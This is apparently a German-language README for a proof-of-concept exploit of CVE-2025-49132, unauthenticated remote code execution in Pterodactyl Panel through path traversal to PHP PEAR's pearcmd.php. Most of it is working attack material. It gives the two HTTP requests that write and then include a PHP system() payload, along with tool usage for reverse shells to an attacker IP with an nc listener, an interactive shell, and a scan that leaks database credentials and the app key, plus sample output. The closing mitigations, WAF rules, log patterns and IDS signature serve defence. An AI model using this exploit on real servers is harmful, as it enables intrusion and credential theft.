
CVE-2025-49132_PHP_PEAR_METHOD
Dieses Repository enthält einen Proof-of-Concept (PoC)-Exploit für CVE-2025-49132, eine kritische Schwachstelle für nicht authentifizierte Remote-Codeausführung in Pterodactyl Panel-Versionen vor 1.11.11.
Pterodactyl Panel ist ein kostenloses, quelloffenes Spielserver-Verwaltungspanel, das mit PHP erstellt wurde. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebige Systembefehle auf dem Zielserver auszuführen, und zwar durch unsachgemäße Handhabung des Endpunkts /locales/locale.json in Kombination mit der pearcmd.php-Funktionalität von PHP PEAR.
PHP PEAR (PHP Extension and Application Repository) ist ein Framework und ein Verteilungssystem für wiederverwendbare PHP-Komponenten. Es stellt ein Befehlszeilentool (pearcmd.php) zur Verfügung, das zur Verwaltung von PEAR-Paketen verwendet werden kann.
Die Datei pearcmd.php verarbeitet Befehle über URL-Parameter und kann in Kombination mit Path Traversal genutzt werden, um:
Die Schwachstelle besteht, weil:
locale in /locales/locale.json ermöglicht Path Traversal ohne ordnungsgemäße Validierungpearcmd.php akzeptiert den Befehl +config-create, der beliebige PHP-Dateien schreiben kannEin Angreifer kann:
config-create missbrauchen, um schädlichen PHP-Code nach /tmp zu schreibenDer Exploit arbeitet in zwei Phasen:
GET /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&<?=system('id')?>+/tmp/payload.php HTTP/1.1
Host: target.com
Aufschlüsselung:
+config-create+/ - Ruft die Konfigurationserstellungsfunktion von PEAR auflocale=../../../../../../usr/share/php/PEAR - Path Traversal zum PEAR-Verzeichnisnamespace=pearcmd - Ziel ist die Datei pearcmd.php<?=system('id')?>+/tmp/payload.php - PHP-Payload und ZieldateiGET /locales/locale.json?locale=../../../../../../tmp&namespace=payload HTTP/1.1
Host: target.com
Aufschlüsselung:
locale=../../../../../../tmp - Path Traversal zum /tmp-Verzeichnisnamespace=payload - Bindet payload.php ein und führt es ausDer Exploit erfordert das Senden von Sonderzeichen (<, >, ?, =) in der URL ohne Kodierung. Wenn diese Zeichen URL-kodiert werden:
<?=system('id')?> wird zu %3C%3F%3Dsystem%28%27id%27%29%3F%3Egraph TD
A[Attacker] -->|1. Path Traversal Request| B[locale.json]
B -->|2. Traverse to PEAR| C[pearcmd.php]
C -->|3. config-create Command| D[Write PHP Payload]
D -->|4. Create File| E[payload.php]
E -->|5. File Created| F[Server Filesystem]
A -->|6. Execution Request| G[locale.json]
G -->|7. Traverse to tmp| E
E -->|8. Include and Execute| H[PHP Interpreter]
H -->|9. System Command| I[Shell Command]
I -->|10. Command Output| A
style A fill:#ff6b6b
style B fill:#4ecdc4
style C fill:#ffe66d
style E fill:#ff6b6b
style H fill:#ff6b6b
style I fill:#ff6b6b
sequenceDiagram
participant Attacker
participant Web Server
participant PEAR
participant Filesystem
participant PHP Engine
Attacker->>Web Server: GET locale.json with config-create
Web Server->>PEAR: Path Traversal to pearcmd
PEAR->>Filesystem: Create payload.php
Filesystem-->>Attacker: 200 OK
Attacker->>Web Server: GET locale.json with payload namespace
Web Server->>Filesystem: Path Traversal to payload.php
Filesystem->>PHP Engine: Include payload
PHP Engine->>PHP Engine: Execute system command
PHP Engine-->>Attacker: Command Output RCE
requests-Bibliothekgit clone https://github.com/xffsec/CVE-2025-49132_PEAR_METHOD.git
cd CVE-2025-49132_PEAR_METHOD
pip3 install -r requirements.txt
Oder manuell:
pip3 install requests
python3 poc.py -H <target_host> -c "<command>"
# On attacker machine, start listener
nc -lvnp 4444
# Execute exploit with reverse shell
python3 poc.py -H <target_host> -r <your_ip>:4444
python3 poc.py -H <target_host> --shell
python3 poc.py -H <target_host> --fuzz
python3 poc.py -H <target_host> --scan
Prüft auf CVE-2025-49132 durch Konfigurationslecks (Datenbank-Anmeldedaten, App-Schlüssel).
python3 poc.py -H <target_host> -c "whoami" -p "/opt/pear"
python3 poc.py -H <target_host> -c "id" -v
Zeigt detaillierten Fortschritt (Payload-Erstellung, PEAR-Pfad, Ausführungsstatus).
usage: poc.py [-h] -H HOST [-c COMMAND] [-r REVERSE_SHELL] [--shell] [--fuzz] [--scan]
[-p PEAR_PATH] [-e ENDPOINT] [--ssl] [--timeout TIMEOUT] [-v]
optional arguments:
-h, --help show this help message and exit
-H HOST, --host HOST Target host (e.g., 192.168.1.100 or example.com)
-c COMMAND Command to execute on target system
-r REVERSE_SHELL Reverse shell (format: LHOST:LPORT)
--shell Interactive pseudo-shell mode
--fuzz Fuzz for PEAR installation paths
--scan Scan target for vulnerability (config leaks)
-p PEAR_PATH Custom PEAR path (default: /usr/share/php/PEAR)
-e ENDPOINT Vulnerable endpoint (default: /locales/locale.json)
--ssl Use HTTPS
--timeout TIMEOUT Request timeout in seconds (default: 10)
-v, --verbose Verbose progress output
$ python3 poc.py -H panel.pterodactyl.htb -c "id"
[CVE-2025-49132] Pterodactyl Panel RCE via PHP PEAR
[+] Command Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Verwenden Sie -v für ausführliche Ausgabe (Payload-Details, PEAR-Pfad usw.).
# Terminal 1: Start listener
$ nc -lvnp 4444
listening on [any] 4444 ...
# Terminal 2: Execute exploit
$ python3 poc.py -H panel.pterodactyl.htb -r 10.10.14.5:4444
╔══════════════════════════════════════╗
║ CVE-2025-49132 - Pterodactyl RCE ║
╚══════════════════════════════════════╝
[!] Make sure your listener is running: nc -lvnp 4444
# Terminal 1: Receive connection
connect to [10.10.14.5] from (UNKNOWN) [panel.pterodactyl.htb] 45678
www-data@pterodactyl:/var/www/pterodactyl$
$ python3 poc.py -H panel.pterodactyl.htb --shell
shell> whoami
www-data
shell> pwd
/var/www/pterodactyl
shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell> exit
$ python3 poc.py -H panel.pterodactyl.htb --fuzz
╔══════════════════════════════════════╗
║ CVE-2025-49132 - Pterodactyl RCE ║
╚══════════════════════════════════════╝
[+] Found 3 potential PEAR installation(s):
/usr/share/php/PEAR
/usr/share/pear
/usr/local/lib/php/PEAR
[*] Use -p flag with one of these paths for exploitation
Verwenden Sie -v, um den Fuzzing-Fortschritt pro Pfad zu sehen.
$ python3 poc.py -H panel.pterodactyl.htb --scan
╔══════════════════════════════════════╗
║ CVE-2025-49132 - Pterodactyl RCE ║
╚══════════════════════════════════════╝
[*] Scanning: http://panel.pterodactyl.htb/locales/locale.json
-------------------------------------------------------
[+] VULNERABLE - Database credentials leaked
Host: 127.0.0.1
Port: 3306
Database: panel
Username: pterodactyl
Password: ********
Connection: pterodactyl:********@127.0.0.1:3306/panel
[+] VULNERABLE - App configuration leaked
App Key: base64{...}
[!] SECURITY WARNING: APP_KEY exposed!
-------------------------------------------------------
[+] Target is VULNERABLE to CVE-2025-49132
Pterodactyl Panel aktualisieren
cd /var/www/pterodactyl
php artisan p:upgrade
Auf Version 1.11.11 oder höher aktualisieren.
Anfälligen Endpunkt deaktivieren (Temporäre Problemumgehung)
Fügen Sie Ihrer Webserver-Konfiguration hinzu:
Apache (.htaccess):
<Files "locale.json">
Order Allow,Deny
Deny from all
</Files>
Nginx:
location ~* /locales/locale\.json {
deny all;
return 403;
}
Hinweis: Dies wird die Lokalisierungsfunktionen beeinträchtigen.
Web Application Firewall (WAF)
Implementieren Sie WAF-Regeln, um Path-Traversal-Versuche zu blockieren:
SecRule REQUEST_URI "@contains ../" "id:1000,phase:1,deny,status:403"
SecRule ARGS "@contains ../" "id:1001,phase:2,deny,status:403"
locale und namespacerealpath(), um Dateipfade aufzulösen und zu validierenLog-Analyse - Achten Sie auf verdächtige Muster:
# Apache/Nginx access logs
grep "locale.json" /var/log/apache2/access.log | grep "\.\."
grep "pearcmd" /var/log/apache2/access.log
grep "config-create" /var/log/apache2/access.log
# Look for payload files
find /tmp -name "payload.php" -o -name "*.php" -mtime -1
IDS/IPS-Signaturen:
alert http any any -> any any (msg:"CVE-2025-49132 PEAR RCE Attempt";
content:"/locales/locale.json"; http_uri;
content:"pearcmd"; http_uri;
content:"config-create"; http_uri;
sid:1000001; rev:1;)
NUR ZU BILDUNGSZWECKEN UND AUTORISIERTEN TESTS
Dieser Proof-of-Concept-Exploit wird nur zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
Unbefugter Zugriff auf Computersysteme ist illegal. Die Nutzer sind dafür verantwortlich, die Einhaltung der geltenden Gesetze und Vorschriften sicherzustellen.
xffsec
| Kontakt |
|---|
| GitHub: @xffsec |
| E-Mail: [email protected] |
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.
Beiträge, Probleme und Funktionsanfragen sind willkommen! Zögern Sie nicht, ein Issue zu eröffnen oder einen Pull-Request einzureichen.
⚠️ Denken Sie daran: Praktizieren Sie stets verantwortungsvolle Offenlegung und nutzen Sie Schwachstellen niemals ohne entsprechende Autorisierung.